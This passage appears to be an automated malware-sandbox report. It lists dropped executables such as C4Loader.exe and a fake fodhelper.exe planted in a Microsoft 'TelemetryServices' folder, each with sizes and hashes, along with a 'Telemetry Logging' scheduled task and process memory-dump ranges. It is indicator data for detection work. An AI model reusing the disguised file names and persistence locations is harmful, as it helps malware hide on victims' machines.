SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\18T61W38F173NRCKFO64.tempFilesize
7KB
MD507e83c96c6b2b03fba4d43816cb7b10c
SHA14910b242403a62360291e8407efaa271d2c9dd80
SHA256e38ae0d1b2c48e277658b4675dc279be27a60b0712c53e8554362e7977eb0a66
SHA51225f8e7c79f298a3fc5fe412ac6bb3ef41f31fe8666c2bf9a62d547bb9cb54aeeae9678116a918408810f8f8f8afb13e825e8e5f93c83069ac2a706d7a634879f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD507e83c96c6b2b03fba4d43816cb7b10c
SHA14910b242403a62360291e8407efaa271d2c9dd80
SHA256e38ae0d1b2c48e277658b4675dc279be27a60b0712c53e8554362e7977eb0a66
SHA51225f8e7c79f298a3fc5fe412ac6bb3ef41f31fe8666c2bf9a62d547bb9cb54aeeae9678116a918408810f8f8f8afb13e825e8e5f93c83069ac2a706d7a634879f
-
C:\Windows\System32\Tasks\Telemetry LoggingFilesize
3KB
MD578f6e2f6e0462eefb43f9b871ea25d3b
SHA11279dba7f0bc2a3fdc3f067381329c5e84d71d68
SHA256fe1278f39fe1218b83c12e790219762044aa98819197e6737f380fbc243394fa
SHA5128a678befce66442e32d07112be6fbb9eb9e20ff5b1dae729df821d85e3a85c0ecd4523d30780f1a8afe269350c31f5ecf030c92cc64d0457c3865230429b9856
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
memory/276-251-0x0000000000940000-0x0000000000967000-memory.dmpFilesize
156KB
-
memory/276-259-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/360-240-0x0000000001D10000-0x0000000001D37000-memory.dmpFilesize
156KB
-
memory/416-151-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/416-150-0x0000000000870000-0x0000000000897000-memory.dmpFilesize
156KB
-
memory/416-148-0x00000000007A0000-0x00000000007C1000-memory.dmpFilesize
132KB
-
memory/416-147-0x00000000007A0000-0x00000000007C1000-memory.dmpFilesize
132KB
-
memory/416-152-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/416-222-0x0000000000870000-0x0000000000897000-memory.dmpFilesize
156KB
-
memory/432-59-0x0000000002610000-0x0000000002650000-memory.dmpFilesize
256KB
-
memory/432-60-0x0000000002610000-0x0000000002650000-memory.dmpFilesize
256KB
-
memory/460-157-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/460-159-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/460-155-0x0000000000120000-0x0000000000147000-memory.dmpFilesize
156KB
-
memory/460-224-0x0000000000120000-0x0000000000147000-memory.dmpFilesize
156KB
-
memory/476-161-0x00000000000D0000-0x00000000000F7000-memory.dmpFilesize
156KB
-
memory/476-226-0x00000000000D0000-0x00000000000F7000-memory.dmpFilesize
156KB
-
memory/476-162-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/476-165-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/484-172-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/484-229-0x0000000000410000-0x0000000000437000-memory.dmpFilesize
156KB
-
memory/484-170-0x0000000000410000-0x0000000000437000-memory.dmpFilesize
156KB
-
memory/484-171-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/600-191-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/600-230-0x0000000000490000-0x00000000004B7000-memory.dmpFilesize
156KB
-
memory/600-185-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/600-177-0x0000000000490000-0x00000000004B7000-memory.dmpFilesize
156KB
-
memory/612-293-0x00000000002B0000-0x00000000002D7000-memory.dmpFilesize
156KB
-
memory/680-182-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/680-181-0x00000000004D0000-0x00000000004F7000-memory.dmpFilesize
156KB
-
memory/680-187-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/680-234-0x00000000004D0000-0x00000000004F7000-memory.dmpFilesize
156KB
-
memory/696-267-0x0000000000480000-0x00000000004A7000-memory.dmpFilesize
156KB
-
memory/696-297-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/768-183-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/768-180-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/768-178-0x0000000000AC0000-0x0000000000AE7000-memory.dmpFilesize
156KB
-
memory/768-232-0x0000000000AC0000-0x0000000000AE7000-memory.dmpFilesize
156KB
-
memory/812-190-0x0000000000500000-0x0000000000527000-memory.dmpFilesize
156KB
-
memory/812-237-0x0000000000500000-0x0000000000527000-memory.dmpFilesize
156KB
-
memory/812-192-0x000007FEBD700000-0x000007FEBD710000-memory.dmpFilesize
64KB
-
memory/840-244-0x00000000008E0000-0x0000000000907000-memory.dmpFilesize
156KB
-
memory/884-112-0x00000000022E0000-0x00000000022E8000-memory.dmpFilesize
32KB
-
memory/884-115-0x0000000002570000-0x00000000025F0000-memory.dmpFilesize
512KB
-
memory/884-111-0x000000001B010000-0x000000001B2F2000-memory.dmpFilesize
2.9MB
-
memory/884-114-0x0000000002570000-0x00000000025F0000-memory.dmpFilesize
512KB
-
memory/884-117-0x0000000002570000-0x00000000025F0000-memory.dmpFilesize
512KB
-
memory/884-116-0x0000000002570000-0x00000000025F0000-memory.dmpFilesize
512KB
-
memory/968-258-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/968-249-0x0000000000810000-0x0000000000837000-memory.dmpFilesize
156KB
-
memory/1016-141-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1016-302-0x00000000003B0000-0x00000000003D7000-memory.dmpFilesize
156KB
-
memory/1016-139-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1016-142-0x0000000077310000-0x00000000774B9000-memory.dmpFilesize
1.7MB
-
memory/1016-143-0x00000000771F0000-0x000000007730F000-memory.dmpFilesize
1.1MB
-
memory/1016-144-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1040-300-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/1040-298-0x00000000009D0000-0x00000000009F7000-memory.dmpFilesize
156KB
-
memory/1056-138-0x00000000010F0000-0x0000000001130000-memory.dmpFilesize
256KB
-
memory/1056-136-0x00000000010F0000-0x0000000001130000-memory.dmpFilesize
256KB
-
memory/1056-137-0x00000000010F0000-0x0000000001130000-memory.dmpFilesize
256KB
-
memory/1076-254-0x00000000007C0000-0x00000000007E7000-memory.dmpFilesize
156KB
-
memory/1116-262-0x0000000001E70000-0x0000000001E97000-memory.dmpFilesize
156KB
-
memory/1116-295-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/1160-128-0x0000000000AC0000-0x0000000000AC8000-memory.dmpFilesize
32KB
-
memory/1160-134-0x0000000001110000-0x0000000001190000-memory.dmpFilesize
512KB
-
memory/1160-131-0x0000000077310000-0x00000000774B9000-memory.dmpFilesize
1.7MB
-
memory/1160-132-0x00000000771F0000-0x000000007730F000-memory.dmpFilesize
1.1MB
-
memory/1160-135-0x0000000001110000-0x0000000001190000-memory.dmpFilesize
512KB
-
memory/1160-133-0x0000000001110000-0x0000000001190000-memory.dmpFilesize
512KB
-
memory/1160-130-0x00000000012B0000-0x00000000012D6000-memory.dmpFilesize
152KB
-
memory/1160-127-0x0000000019B50000-0x0000000019E32000-memory.dmpFilesize
2.9MB
-
memory/1176-264-0x00000000001E0000-0x0000000000207000-memory.dmpFilesize
156KB
-
memory/1208-296-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/1208-265-0x0000000003AE0000-0x0000000003B07000-memory.dmpFilesize
156KB
-
memory/1260-54-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1260-56-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1328-303-0x0000000000AE0000-0x0000000000B07000-memory.dmpFilesize
156KB
-
memory/1436-101-0x0000000001FA0000-0x00000000024A4000-memory.dmpFilesize
5.0MB
-
memory/1436-120-0x0000000001DA0000-0x0000000001EDD000-memory.dmpFilesize
1.2MB
-
memory/1500-118-0x0000000000490000-0x00000000004A4000-memory.dmpFilesize
80KB
-
memory/1500-294-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1500-107-0x0000000004F30000-0x0000000005096000-memory.dmpFilesize
1.4MB
-
memory/1500-125-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1500-92-0x0000000000110000-0x000000000027C000-memory.dmpFilesize
1.4MB
-
memory/1500-124-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1500-94-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1500-113-0x0000000005090000-0x00000000051DE000-memory.dmpFilesize
1.3MB
-
memory/1500-306-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1500-305-0x0000000004C10000-0x0000000004C50000-memory.dmpFilesize
256KB
-
memory/1944-122-0x000000013F250000-0x000000013F610000-memory.dmpFilesize
3.8MB
-
memory/1972-301-0x0000000037350000-0x0000000037360000-memory.dmpFilesize
64KB
-
memory/1972-299-0x0000000000820000-0x0000000000847000-memory.dmpFilesize
156KB
-
memory/1996-103-0x000000000275B000-0x0000000002792000-memory.dmpFilesize
220KB
-
memory/1996-99-0x000000001B1C0000-0x000000001B4A2000-memory.dmpFilesize
2.9MB
-
memory/1996-100-0x0000000001F10000-0x0000000001F18000-memory.dmpFilesize
32KB
-
memory/1996-102-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/2012-123-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/2040-334-0x0000000000120000-0x0000000000147000-memory.dmpFilesize
156KB